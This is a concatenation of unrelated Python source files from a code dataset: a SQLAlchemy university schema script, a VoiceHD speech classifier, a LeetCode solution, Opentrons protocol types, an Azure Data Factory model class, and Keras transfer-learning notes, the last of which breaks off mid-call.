Table('instructor_course', Base.metadata, Column('instructor_id', ForeignKey('instructor.id'),\\\n\t\t\t\t\t\t primary_key = True), Column('course_id', ForeignKey('course.id'), primary_key = True))\n#top class (extra addition)\nclass University(Base):\n\t__tablename__ = 'university'\n\tid = Column(Integer, Sequence('university_id_seq'), primary_key = True)\n\tname = Column(String)\n\n\t#one-to-many relationship between \"University\" and \"Course\" classes\n\tcourses = relationship('Course', order_by = 'Course.name', back_populates = 'university')\n\n\tdef __repr__(self):\n\t\treturn \"{}\".format(self.name)\n\nclass Course(Base):\n\t__tablename__ = 'course'\n\tid = Column(Integer, Sequence('course_id_seq'), primary_key = True)\n\tname = Column(String)\n\t#parent table reference\n\tuniversity_id = Column(Integer, ForeignKey('university.id'))\n\t\n\t#one-to-many relationship between \"University\" and \"Course\" classes\n\tuniversity = relationship('University', back_populates = 'courses')\n\t#one-to-many relationship between \"Course\" and \"Student\" classes\n\tstudents = relationship('Student', order_by = 'Student.lastname', back_populates = 'course')\n\t#many-to-many relationship between \"Course\" and \"Instructor\" classes\n\tinstructors = relationship('Instructor', secondary = instructor_course, back_populates = 'courses')\n\t#one-to-many relationship between \"Course\" and \"Schedule\" classes\n\tschedules = relationship('Schedule', order_by = 'Schedule.id', back_populates = 'course')\n\n\tdef __repr__(self):\n\t\treturn '{}'.format(self.name)\n\nclass Student(Base):\n\t__tablename__ = 'student'\n\tid = Column(Integer, Sequence('student_id_seq'), primary_key = True)\n\tfirstname = Column(String)\n\tlastname = Column(String)\n\t#parent table reference\n\tcourse_id = Column(Integer, ForeignKey('course.id'))\n\t\n\t\n\tcourse = relationship('Course', back_populates = 'students') \n\n\tdef __repr__(self):\n\t\treturn '{} {}'.format(self.lastname, self.firstname)\n\nclass Instructor(Base):\n\t__tablename__ = 'instructor'\n\tid = Column(Integer, Sequence('instructor_id_seq'), primary_key = True)\n\tfirstname = Column(String)\n\tlastname = Column(String)\n\n\t\n\tcourses = relationship('Course', secondary = instructor_course, back_populates = 'instructors')\n\t#\n\tschedules = relationship('Schedule', order_by = 'Schedule.id', back_populates = 'instructor')\n\n\tdef __repr__(self):\n\t\treturn '{} {}'.format(self.lastname, self.firstname)\n\nclass Schedule(Base):\n\t__tablename__ = 'schedule'\n\tid = Column(Integer, Sequence('schedule_id_seq'), primary_key = True)\n\tdays = ['Monday', 'Thursday', 'Wednesday', 'Tuesday', 'Friday', 'Saturday']\n\tday = Column(String)\n\tstart_time = Column(String)\n\tending_time = Column(String)\n\t#parent table reference\n\tinstructor_id = Column(Integer, ForeignKey('instructor.id'))\n\t#parent table reference\n\tcourse_id = Column(Integer, ForeignKey('course.id'))\n\n\n\tinstructor = relationship('Instructor', back_populates = 'schedules')\n\t\n\tcourse = relationship('Course', back_populates = 'schedules')\n\n\tdef __repr__(self):\n\t\treturn '{}, {}-{}'.format(self.day, self.start_time, self.ending_time)\n\n#create foreign key constraints\nBase.metadata.create_all(engine)\n#global scope\nSession = sessionmaker(bind = engine)\n#create and use a session\nsession = Session()\n#create top object (extra addition)\nuniversity = University(name = \"Tec de Monterrey\")\n#establish some initial courses\nuniversity.courses = [Course(name = 'Applied Robotic'), Course(name = \"Databases\"), Course(name = 'Multiprocessors'),\\\n\t\t\t\t\t Course(name = 'Networking')]\n#establish some initial instructors\n#instructor 1\nnew_instructor = Instructor(firstname = 'Charles', lastname = 'Hawking')\nnew_instructor.schedules.append(Schedule(day = 'Monday', start_time = '13:00', ending_time = '14:30'))\nnew_instructor.schedules[0].course = university.courses[0]\nuniversity.courses[0].instructors.append(new_instructor)\n#instructor 2\nnew_instructor = Instructor(firstname = 'Marie', lastname = 'Heissenberg')\nnew_instructor.schedules.append(Schedule(day = 'Thursday', start_time = '13:00', ending_time = '14:30'))\nnew_instructor.schedules[0].course = university.courses[0]\nuniversity.courses[0].instructors.append(new_instructor)\n#instructor 3\nnew_instructor = Instructor(firstname = 'Nikola', lastname = 'Turing')\nnew_instructor.schedules.append(Schedule(day = 'Saturday', start_time = '11:00', ending_time = '12:00'))\nnew_instructor.schedules[0].course = university.courses[0]\nuniversity.courses[0].instructors.append(new_instructor)\nnew_instructor.schedules.append(Schedule(day = 'Wednesday', start_time = '13:00', ending_time = '16:00'))\nnew_instructor.schedules[-1].course = university.courses[2]\nuniversity.courses[2].instructors.append(new_instructor)\n#instructor 4\nnew_instructor = Instructor(firstname = 'Agustin', lastname = 'Olmedo')\nnew_instructor.schedules.extend([Schedule(day = 'Monday', start_time = '10:00', ending_time = '11:30'),\\\n\t\t\t\t\t\t\t\t Schedule(day = 'Wednesday', start_time = '16:00', ending_time = '19:00'),\\\n\t\t\t\t\t\t\t\t Schedule(day = 'Thursday', start_time = '10:00', ending_time = '11:30')])\nnew_instructor.schedules[0].course = university.courses[1]\nnew_instructor.schedules[1].course = university.courses[1]\nnew_instructor.schedules[2].course = university.courses[1]\nuniversity.courses[1].instructors.append(new_instructor)\n#establish some initial students\nsession.add_all([\n\tStudent(firstname='Hedguhar', lastname='Dominguez'),\n\tStudent(firstname='Elle', lastname='Fanning')])\n#add university to the session\nsession.add(university)\n#write changes to database\nsession.commit()\n\n__author__ = \"Hedguhar D. G.\"\n__version__ = \"1.25\"","sub_path":"Coursera Course/4 - Manejo de bases de datos con Python/Proyecto Final/ej.py","file_name":"ej.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"125167162","text":"# Basic implementation of VoiceHD without retraining\n\nimport matplotlib.pyplot as plt\nimport multiprocessing\nimport numpy as np\nimport sys\nimport argparse\nfrom scipy.spatial import distance as dst\nfrom sklearn.decomposition import PCA as sklearnPCA\nimport pandas as pd\nimport seaborn as sn\nimport math, random\nfrom statistics import mean\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--plot\", dest=\"plot\", action=\"store_true\")\nparser.add_argument('--m', type=int, default=10)\nparser.add_argument('--dimension', type=int, default=10000)\nparser.add_argument('--retrain', type=int, default=0)\nparser.set_defaults(debug=False, plot=False, randomize=False, average=False, dual=False)\nargs = parser.parse_args()\n\nN = 617 # number of features\nD = args.dimension # hypervector dimensions\nM = args.m # number of levels\n\n\nclass Record_Based:\n\n def __init__(self):\n # Create ID vectors\n self.ID = []\n for _ in range(N):\n self.ID.append(np.random.randint(2, size=D))\n\n # Create level vectors\n self.L = []\n self.L.append(np.random.randint(2, size=D))\n\n flip = D // (M - 1)\n rand_order = np.random.permutation(range(D))\n\n count = 0\n for i in range(1, M):\n self.L.append(np.copy(self.L[i - 1]))\n for _ in range(flip):\n # rand_order prevents repeating flipped indices\n #[rand_order[count]] ->0,1,2,3,4,5,6...\n self.L[i][rand_order[count]] = not self.L[i][rand_order[count]]\n count += 1\n\n #The encoder outputs a voice hypervector with D binary (0,1) components.\n def encode(self, inp):\n S = [0] * D\n thresh = N / 2\n\n for i in range(N):\n S = np.add(S, np.bitwise_xor(self.ID[i], self.L[inp[i]]))\n return [int(x // thresh) for x in S]\n\n\ndef init():\n # Bins used to discretize data into M levels\n bins = np.linspace(-1, 1, num=M, endpoint=False)\n # Load train and test data into (26,0) arrays by class\n train = [[] for _ in range(26)]\n with open('./isolet1+2+3+4.data', 'r') as f:\n for line in f:\n currentline = list(map(float, line.split(',')))\n # currentline[-1] is label and .append(currentline[:-1]) means each 26rows has 617inputs\n train[int(currentline[-1]) - 1].append(currentline[:-1])\n\n train = bin_data(train, bins)\n\n test = [[] for _ in range(26)]\n with open('./isolet5.data', 'r') as f:\n for line in f:\n currentline = list(map(float, line.split(',')))\n test[int(currentline[-1]) - 1].append(currentline[:-1])\n test = bin_data(test, bins)\n return train, test\n\n\n# Round real valued input data to number of network states\n# np.digitize(a,b) -> if b = [1, 2, 3], then a's each index below 1 is 0, between 1 ~ 2 = 1 ...\n# np.digitize(data[letter][line], bins, right=False) -> 1~10\n# So result will be the matrix between (0~9)\ndef bin_data(data, bins):\n result = [[] for _ in range(26)]\n for letter in range(26):\n for line in range(len(data[letter])):\n result[letter].append([x - 1 for x in np.digitize(data[letter][line], bins, right=False)])\n return result\n\n\ndef parallel_train(train, model, letter, lo):\n my_letter = np.array([0 for _ in range(D)])\n if lo:\n for i in range(120):\n\n my_letter += np.reshape(model.encode(train[i]), D)\n else:\n for i in range(120, len(train)):\n my_letter += np.reshape(model.encode(train[i]), D)\n letter[:] = np.add(letter, my_letter)\n\n# hamming distance\ndef parallel_test(test, model, correct_letter, letters, lo, incorrect, prediction):\n offset = 0 if lo else 30\n for i in range(30):\n if i + offset == len(test):\n prediction[i + offset] = correct_letter\n break\n test_letter = np.reshape(model.encode(test[i + offset]), D)\n min_distance = dst.hamming(letters[0], test_letter)\n min_distance_letter = 0\n for j in range(1, 26):\n distance = dst.hamming(letters[j], test_letter)\n if distance < min_distance:\n min_distance = distance\n min_distance_letter = j\n prediction[i + offset] = min_distance_letter\n if correct_letter != min_distance_letter:\n with incorrect.get_lock():\n incorrect.value += 1\n\n\ndef test_letters(letters, test, model):\n threads = 52\n incorrect = multiprocessing.Value('i', 0)\n prediction = [multiprocessing.Array('i', range(60)) for _ in range(26)]\n print('Testing')\n jobs = []\n for i in range(threads):\n letter = i // 2\n lo = True if i % 2 == 0 else False\n p = multiprocessing.Process(target=parallel_test,\n args=(test[letter], model, letter, letters, lo, incorrect,\n prediction[letter]))\n jobs.append(p)\n p.start()\n for j in jobs:\n j.join()\n return incorrect.value, prediction\n\n\ndef train_letters(train, model, retrain):\n threads = 52\n letters = [multiprocessing.Array('i', range(D)) for _ in range(26)]\n\n print('Training')\n for i in range(26):\n letters[i][:] = list(map(lambda x: 0, letters[i]))\n jobs = []\n for i in range(threads):\n letter = i // 2\n lo = True if i % 2 == 0 else False\n\n p = multiprocessing.Process(target=parallel_train,\n args=(train[letter], model, letters[letter], lo))\n jobs.append(p)\n p.start()\n for j in jobs:\n j.join()\n\n if not retrain:\n # Threshold class vectors to # number of states\n for i in range(26):\n # Two training data are missing\n instances = 238 if i == 5 else 240\n letters[i] = list(map(lambda x: round(x / instances), letters[i]))\n return letters\n\n\ndef plot_letters(letters):\n pca = sklearnPCA(n_components=2)\n transformed = pd.DataFrame(pca.fit_transform(letters))\n print(np.shape(transformed))\n print(transformed)\n letter_list = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n letter_dict = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6, 'h': 7, 'i': 8,\n 'j': 9, 'k': 10, 'l': 11, 'm': 12, 'n': 13, 'o': 14, 'p': 15, 'q': 16, 'r': 17,\n 's': 18, 't': 19, 'u': 20, 'v': 21, 'w': 22, 'x': 23, 'y': 24, 'z': 25}\n for letter in letter_list:\n x = transformed[0][letter_dict[letter]]\n y = transformed[1][letter_dict[letter]]\n plt.scatter(x, y, marker='x', color='red')\n plt.text(x + .03, y + .03, letter, fontsize=10)\n plt.show()\n\n\ndef plot_confusion(prediction):\n plt.figure(2)\n act = np.zeros(1560, dtype=int)\n for i in range(1, 26):\n offset = i * 60\n for j in range(60):\n act[offset + j] = i\n letter_list = list('abcdefghijklmnopqrstuvwxyz')\n correction = np.arange(26)\n confusion_data = {'actual': np.append(act, correction),\n 'predicted': np.append(np.reshape(prediction, 1560), correction)}\n df = pd.DataFrame(confusion_data, columns=['actual', 'predicted'])\n confusion_matrix = (pd.crosstab(df['actual'], df['predicted'],\n rownames=['Actual'], colnames=['Predicted'])) # , margins=True))\n sn.heatmap(confusion_matrix, annot=True, yticklabels=letter_list,\n xticklabels=letter_list)\n plt.show()\n\n\ndef main():\n plot = args.plot\n retrain = args.retrain\n model = Record_Based()\n\n print('Hypervector dimensions: %i' % (D))\n train, test = init()\n\n letters = train_letters(train, model, retrain)\n # for i in range(20):\n # print(letters[0][i], end=' ')\n # print()\n\n incorrect, prediction = test_letters(letters, test, model)\n correct = (1 - (incorrect / 1559)) * 100\n print('Number incorrect %i' % (incorrect))\n print('Correct: %.3f %%' % (correct))\n\n # if plot:\n # Use principle component analysis to project class vectors to two dimensions\n plot_letters(letters)\n # Plot confusion matrix of results\n plot_confusion(prediction)\n input('Press to continue.')\n\n\nif __name__ == '__main__':\n main()","sub_path":"project/Project2/Level_ID.py","file_name":"Level_ID.py","file_ext":"py","file_size_in_byte":8314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"50329653","text":"class Solution(object):\n def compare(self, a, b, order):\n len_a = len(a)\n len_b = len(b)\n i = 0\n while i < len_a and i < len_b:\n if order[a[i]] < order[b[i]]:\n return True\n elif order[a[i]] > order[b[i]]:\n return False\n else:\n i += 1\n if len_a < len_b:\n return True\n return False\n \n \n def isAlienSorted(self, words, order):\n \"\"\"\n :type words: List[str]\n :type order: str\n :rtype: bool\n \"\"\"\n i = 0\n order_map = {}\n while i < len(order):\n order_map[order[i]] = i\n i += 1\n \n i = 1\n while i < len(words):\n if not self.compare(words[i-1], words[i], order_map):\n return False\n i += 1\n return True\n \n","sub_path":"Algo/leetcode/algorithms/String/953.py","file_name":"953.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"281236624","text":"from typing import Any, Dict, NamedTuple, Optional, Union, TYPE_CHECKING\n\nif TYPE_CHECKING:\n from opentrons_shared_data.labware.dev_types import LabwareDefinition\n from opentrons_shared_data.protocol.dev_types import (\n JsonProtocol as JsonProtocolDef\n )\n\nMetadata = Dict[str, Union[str, int]]\n\n\nclass APIVersion(NamedTuple):\n major: int\n minor: int\n\n def __str__(self):\n return f'{self.major}.{self.minor}'\n\n\nclass JsonProtocol(NamedTuple):\n text: str\n filename: Optional[str]\n contents: 'JsonProtocolDef'\n schema_version: int\n\n\nclass PythonProtocol(NamedTuple):\n text: str\n filename: Optional[str]\n contents: Any # This is the output of compile() which we can't type\n metadata: Metadata\n api_level: APIVersion\n # these 'bundled_' attrs should only be included when the protocol is a zip\n bundled_labware: Optional[Dict[str, 'LabwareDefinition']]\n bundled_data: Optional[Dict[str, bytes]]\n bundled_python: Optional[Dict[str, str]]\n # this should only be included when the protocol is not a zip\n extra_labware: Optional[Dict[str, 'LabwareDefinition']]\n\n\nProtocol = Union[JsonProtocol, PythonProtocol]\n\n\nclass BundleContents(NamedTuple):\n protocol: str\n bundled_labware: Dict[str, 'LabwareDefinition']\n bundled_data: Dict[str, bytes]\n bundled_python: Dict[str, str]\n\n\nPROTOCOL_MALFORMED = \"\"\"\n\nA Python protocol for the OT2 must define a function called 'run' that takes a\nsingle argument: the protocol context to call functions on. For instance, a run\nfunction might look like this:\n\ndef run(ctx):\n ctx.comment('hello, world')\n\nThis function is called by the robot when the robot executes the protol.\nThis function is not present in the current protocol and must be added.\n\"\"\"\n\n\nclass MalformedProtocolError(Exception):\n def __init__(self, message):\n self.message = message\n super().__init__(message)\n\n def __str__(self):\n return self.message + PROTOCOL_MALFORMED\n\n def __repr__(self):\n return '<{}: {}>'.format(self.__class__.__name__, self.message)\n","sub_path":"api/src/opentrons/protocols/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"536574384","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom .execution_activity import ExecutionActivity\n\n\nclass CopyActivity(ExecutionActivity):\n \"\"\"Copy activity.\n\n All required parameters must be populated in order to send to Azure.\n\n :param additional_properties: Unmatched properties from the message are\n deserialized this collection\n :type additional_properties: dict[str, object]\n :param name: Required. Activity name.\n :type name: str\n :param description: Activity description.\n :type description: str\n :param depends_on: Activity depends on condition.\n :type depends_on: list[~azure.mgmt.datafactory.models.ActivityDependency]\n :param user_properties: Activity user properties.\n :type user_properties: list[~azure.mgmt.datafactory.models.UserProperty]\n :param type: Required. Constant filled by server.\n :type type: str\n :param linked_service_name: Linked service reference.\n :type linked_service_name:\n ~azure.mgmt.datafactory.models.LinkedServiceReference\n :param policy: Activity policy.\n :type policy: ~azure.mgmt.datafactory.models.ActivityPolicy\n :param source: Required. Copy activity source.\n :type source: ~azure.mgmt.datafactory.models.CopySource\n :param sink: Required. Copy activity sink.\n :type sink: ~azure.mgmt.datafactory.models.CopySink\n :param translator: Copy activity translator. If not specified, tabular\n translator is used.\n :type translator: object\n :param enable_staging: Specifies whether to copy data via an interim\n staging. Default value is false. Type: boolean (or Expression with\n resultType boolean).\n :type enable_staging: object\n :param staging_settings: Specifies interim staging settings when\n EnableStaging is true.\n :type staging_settings: ~azure.mgmt.datafactory.models.StagingSettings\n :param parallel_copies: Maximum number of concurrent sessions opened on\n the source or sink to avoid overloading the data store. Type: integer (or\n Expression with resultType integer), minimum: 0.\n :type parallel_copies: object\n :param data_integration_units: Maximum number of data integration units\n that can be used to perform this data movement. Type: integer (or\n Expression with resultType integer), minimum: 0.\n :type data_integration_units: object\n :param enable_skip_incompatible_row: Whether to skip incompatible row.\n Default value is false. Type: boolean (or Expression with resultType\n boolean).\n :type enable_skip_incompatible_row: object\n :param redirect_incompatible_row_settings: Redirect incompatible row\n settings when EnableSkipIncompatibleRow is true.\n :type redirect_incompatible_row_settings:\n ~azure.mgmt.datafactory.models.RedirectIncompatibleRowSettings\n :param preserve_rules: Preserve Rules.\n :type preserve_rules: list[object]\n :param preserve: Preserve rules.\n :type preserve: list[object]\n :param inputs: List of inputs for the activity.\n :type inputs: list[~azure.mgmt.datafactory.models.DatasetReference]\n :param outputs: List of outputs for the activity.\n :type outputs: list[~azure.mgmt.datafactory.models.DatasetReference]\n \"\"\"\n\n _validation = {\n 'name': {'required': True},\n 'type': {'required': True},\n 'source': {'required': True},\n 'sink': {'required': True},\n }\n\n _attribute_map = {\n 'additional_properties': {'key': '', 'type': '{object}'},\n 'name': {'key': 'name', 'type': 'str'},\n 'description': {'key': 'description', 'type': 'str'},\n 'depends_on': {'key': 'dependsOn', 'type': '[ActivityDependency]'},\n 'user_properties': {'key': 'userProperties', 'type': '[UserProperty]'},\n 'type': {'key': 'type', 'type': 'str'},\n 'linked_service_name': {'key': 'linkedServiceName', 'type': 'LinkedServiceReference'},\n 'policy': {'key': 'policy', 'type': 'ActivityPolicy'},\n 'source': {'key': 'typeProperties.source', 'type': 'CopySource'},\n 'sink': {'key': 'typeProperties.sink', 'type': 'CopySink'},\n 'translator': {'key': 'typeProperties.translator', 'type': 'object'},\n 'enable_staging': {'key': 'typeProperties.enableStaging', 'type': 'object'},\n 'staging_settings': {'key': 'typeProperties.stagingSettings', 'type': 'StagingSettings'},\n 'parallel_copies': {'key': 'typeProperties.parallelCopies', 'type': 'object'},\n 'data_integration_units': {'key': 'typeProperties.dataIntegrationUnits', 'type': 'object'},\n 'enable_skip_incompatible_row': {'key': 'typeProperties.enableSkipIncompatibleRow', 'type': 'object'},\n 'redirect_incompatible_row_settings': {'key': 'typeProperties.redirectIncompatibleRowSettings', 'type': 'RedirectIncompatibleRowSettings'},\n 'preserve_rules': {'key': 'typeProperties.preserveRules', 'type': '[object]'},\n 'preserve': {'key': 'typeProperties.preserve', 'type': '[object]'},\n 'inputs': {'key': 'inputs', 'type': '[DatasetReference]'},\n 'outputs': {'key': 'outputs', 'type': '[DatasetReference]'},\n }\n\n def __init__(self, **kwargs):\n super(CopyActivity, self).__init__(**kwargs)\n self.source = kwargs.get('source', None)\n self.sink = kwargs.get('sink', None)\n self.translator = kwargs.get('translator', None)\n self.enable_staging = kwargs.get('enable_staging', None)\n self.staging_settings = kwargs.get('staging_settings', None)\n self.parallel_copies = kwargs.get('parallel_copies', None)\n self.data_integration_units = kwargs.get('data_integration_units', None)\n self.enable_skip_incompatible_row = kwargs.get('enable_skip_incompatible_row', None)\n self.redirect_incompatible_row_settings = kwargs.get('redirect_incompatible_row_settings', None)\n self.preserve_rules = kwargs.get('preserve_rules', None)\n self.preserve = kwargs.get('preserve', None)\n self.inputs = kwargs.get('inputs', None)\n self.outputs = kwargs.get('outputs', None)\n self.type = 'Copy'\n","sub_path":"sdk/datafactory/azure-mgmt-datafactory/azure/mgmt/datafactory/models/copy_activity.py","file_name":"copy_activity.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"221053269","text":"#Keras - front end interface to TensorFlow\n\n############THE VERY BASICS#####################################################\n# The keras.models.Sequential class is a wrapper for the neural network model. \n# It provides common functions like fit(), evaluate(), and compile().\n\nfrom keras.models import Sequential\n\n# Create the Sequential model\nmodel = Sequential()\n\n#1st Layer - Add a flatten layer\nmodel.add(Flatten(input_shape=(32, 32, 3)))\n\n#2nd Layer - Add a fully connected layer (the '100' is the output shape)\nmodel.add(Dense(100))\n\n#3rd Layer - Add a ReLU activation layer\nmodel.add(Activation('relu'))\n\n#4th Layer - Add a fully connected layer - output of last layer should be equal to the number of\n#\"classes\" for a classification problem ... for example MNST (0-9 digits - set to 10), traffic sign classifer was 43 classes\n#This example shows '60'\nmodel.add(Dense(60))\n\n#5th Layer - Add a ReLU activation layer\nmodel.add(Activation('relu'))\n\n# Keras will automatically infer the shape of all layers after the first layer. \n# This means you only have to set the input dimensions for the first layer.\n# The first layer from above, model.add(Flatten(input_shape=(32, 32, 3))), sets the input dimension to (32, 32, 3) \n# and output dimension to (3072=32 x 32 x 3). The second layer takes in the output of the first layer and sets the \n# output dimensions to (100). This chain of passing output to the next layer continues until the last layer, \n#which is the output of the model.\n\n\n#####################################################################################\nimport pickle\nimport numpy as np\nimport tensorflow as tf\n\n# Load pickled data\nwith open('small_train_traffic.p', mode='rb') as f:\n data = pickle.load(f)\n\n# split data\nX_train, y_train = data['features'], data['labels']\n\n# Setup Keras\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Activation, Flatten, Dropout\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.pooling import MaxPooling2D\n\n# ONE EXAMPLE OF A FULLY CONNECTED NETWORK with the following characteristics:\n# Set the first layer to a Flatten() layer with the input_shape set to (32, 32, 3).\n# Set the second layer to a Dense() layer with an output width of 128.\n# Use a ReLU activation function after the second layer.\n# Set the output layer width to 5, because for this data set there are only 5 classes.\n# Use a softmax activation function after the output layer.\n# Train the model for 3 epochs. You should be able to get over 50% training accuracy.\nmy_model = Sequential()\nmy_model.add(Flatten(input_shape=(32, 32, 3)))\nmy_model.add(Dense((128), activation = 'relu'))\n#my_model.add(Activation('relu'))\nmy_model.add(Dense((5), activation = 'softmax'))\n#my_model.add(Activation('softmax'))\n\n#ONE EXAMPLE OF CONVOLUTIONAL\n# Building from the previous network...\n# Add a convolutional layer with 32 filters, a 3x3 kernel, and valid padding before the flatten layer.\n#Add a ReLU activation after the convolutional layer.\n#Add a 2x2 max pooling layer immediately following your convolutional layer.\n#Add a dropout layer after the pooling layer. Set the dropout rate to 50%. (Note in Keras this is the prob to drop)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=(32, 32, 3)))\nmodel.add(MaxPooling2D((2, 2)))\nmodel.add(Dropout(0.5))\nmodel.add(Activation('relu'))\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dense(5))\nmodel.add(Activation('softmax'))\n\n\n# preprocess data\nX_normalized = np.array(X_train / 255.0 - 0.5 )\n\nfrom sklearn.preprocessing import LabelBinarizer\nlabel_binarizer = LabelBinarizer()\ny_one_hot = label_binarizer.fit_transform(y_train)\n\nmy_model.compile('adam', 'categorical_crossentropy', ['accuracy'])\n# Can change the number of epochs here\nhistory = my_model.fit(X_normalized, y_one_hot, epochs=3, validation_split=0.2)\n\n\n\n# evaluate model against the test data\nwith open('small_test_traffic.p', 'rb') as f:\n data_test = pickle.load(f)\n\nX_test = data_test['features']\ny_test = data_test['labels']\n\n# preprocess data\nX_normalized_test = np.array(X_test / 255.0 - 0.5 )\ny_one_hot_test = label_binarizer.fit_transform(y_test)\n\nprint(\"Testing\")\n\nmetrics = model.evaluate(X_normalized_test, y_one_hot_test)\nfor metric_i in range(len(model.metrics_names)):\n metric_name = model.metrics_names[metric_i]\n metric_value = metrics[metric_i]\n print('{}: {}'.format(metric_name, metric_value)) \n\n\n\n###########################From Lesson 18 Transfer Learning, Section 9. VGG##########################\n# Load our images first, and we'll check what we have\nfrom glob import glob\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\n\nimage_paths = glob('images/*.jpg')\n\n# Print out the image paths\nprint(image_paths)\n\n# View an example of an image\nexample = mpimg.imread(image_paths[0])\nplt.imshow(example)\nplt.show()\n\n# Here, we'll load an image and pre-process it\nfrom keras.preprocessing import image\nfrom keras.applications.vgg16 import preprocess_input\nimport numpy as np\n\ni = 1 # Can change this to your desired image to test\nimg_path = image_paths[i]\nimg = image.load_img(img_path, target_size=(224, 224))\nx = image.img_to_array(img)\nx = np.expand_dims(x, axis=0)\nx = preprocess_input(x)\n\n# Note - this will likely need to download a new version of VGG16\nfrom keras.applications.vgg16 import VGG16, decode_predictions\n\n# Load the pre-trained model\nmodel = VGG16(weights='imagenet')\n\n# Perform inference on our pre-processed image\npredictions = model.predict(x)\n\n# Check the top 3 predictions of the model\nprint('Predicted:', decode_predictions(predictions, top=3)[0])\n\n\n###########################From Lesson 18 Transfer Learning, Section 14. Lab on Transfer Learning##########################\n\n# Welcome to the lab on Transfer Learning! Here, you'll get a chance to try out training a network with ImageNet \n# pre-trained weights as a base, but with additional network layers of your own added on. You'll also get to see \n# the difference between using frozen weights and training on all layers.\n\n\n# Set a couple flags for training - you can ignore these for now\nfreeze_flag = True # `True` to freeze layers, `False` for full training\nweights_flag = 'imagenet' # 'imagenet' or None\npreprocess_flag = True # Should be true for ImageNet pre-trained typically\n\n# Loads in InceptionV3\nfrom keras.applications.inception_v3 import InceptionV3\n\n# We can use smaller than the default 299x299x3 input for InceptionV3\n# which will speed up training. Keras v2.0.9 supports down to 139x139x3\ninput_size = 139\n\n# Using Inception with ImageNet pre-trained weights\ninception = InceptionV3(weights=weights_flag, include_top=False,\n input_shape=(input_size,input_size,3))\n\nif freeze_flag == True:\n ## TODO: Iterate through the layers of the Inception model\n ## loaded above and set all of them to have trainable = False\n for layer in inception.layers:\n layer.trainable = False\n#print(\"Model Layers\", inception.layers)\n\n## TODO: Use the model summary function to see all layers in the\n## loaded Inception model\ninception.summary()\n\nfrom keras.layers import Input, Lambda\nimport tensorflow as tf\n\n# Makes the input placeholder layer 32x32x3 for CIFAR-10\ncifar_input = Input(shape=(32,32,3))\n\n# Re-sizes the input with Kera's Lambda layer & attach to cifar_input\nresized_input = Lambda(lambda image: tf.image.resize_images( \n image, (input_size, input_size)))(cifar_input)\n\n# Feeds the re-sized input into Inception model\n# You will need to update the model name if you changed it earlier!\ninp = inception(resized_input)\n\n# Imports fully-connected \"Dense\" layers & Global Average Pooling\nfrom keras.layers import Dense, GlobalAveragePooling2D\n\n## TODO: Setting `include_top` to False earlier also removed the\n## GlobalAveragePooling2D layer, but we still want it.\n## Add it here, and make sure to connect it to the end of Inception\nx1 = GlobalAveragePooling2D()(inp)\n\n## TODO: Create two new fully-connected layers using the Model API\n## format discussed above. The first layer should use `out`\n## as its input, along with ReLU activation. You can choose\n## how many nodes it has, although 512 or less is a good idea.\n## The second layer should take this first layer as input, and\n## be named \"predictions\", with Softmax activation and \n## 10 nodes, as we'll be using the CIFAR10 dataset.\nx2 = Dense(512, activation = 'relu')(x1)\npredictions = Dense(10, activation = 'softmax')(x2)\n\n# Imports the Model API\nfrom keras.models import Model\n\n# Creates the model, assuming your final layer is named \"predictions\"\nmodel = Model(inputs=cifar_input, outputs=predictions)\n\n# Compile the model\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n# Check the summary of this new model to confirm the architecture\nmodel.summary()\n\n#GPU TIME!!\nfrom sklearn.utils import shuffle\nfrom sklearn.preprocessing import LabelBinarizer\nfrom keras.datasets import cifar10\n\n(X_train, y_train), (X_val, y_val) = cifar10.load_data()\n\n# One-hot encode the labels\nlabel_binarizer = LabelBinarizer()\ny_one_hot_train = label_binarizer.fit_transform(y_train)\ny_one_hot_val = label_binarizer.fit_transform(y_val)\n\n# Shuffle the training & test data\nX_train, y_one_hot_train = shuffle(X_train, y_one_hot_train)\nX_val, y_one_hot_val = shuffle(X_val, y_one_hot_val)\n\n# We are only going to use the first 10,000 images for speed reasons\n# And only the first 2,000 images from the test set\nX_train = X_train[:10000]\ny_one_hot_train = y_one_hot_train[:10000]\nX_val = X_val[:2000]\ny_one_hot_val = y_one_hot_val[:2000]\n\n\n# Use a generator to pre-process our images for ImageNet\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.applications.inception_v3 import preprocess_input\n\nif preprocess_flag == True:\n datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\n val_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\nelse:\n datagen = ImageDataGenerator()\n val_datagen = ImageDataGenerator()\n\n\n\n# Train the model\nbatch_size = 32\nepochs = 5\n# Note: we aren't using callbacks here since we only are using 5 epochs to conserve GPU time\nmodel.fit_generator(datagen.flow(X_train, y_one_hot_train, batch_size=batch_size), \n steps_per_epoch=len(X_train)/batch_size, epochs=epochs, verbose=1, \n validation_data=val_datagen.flow(X_val, 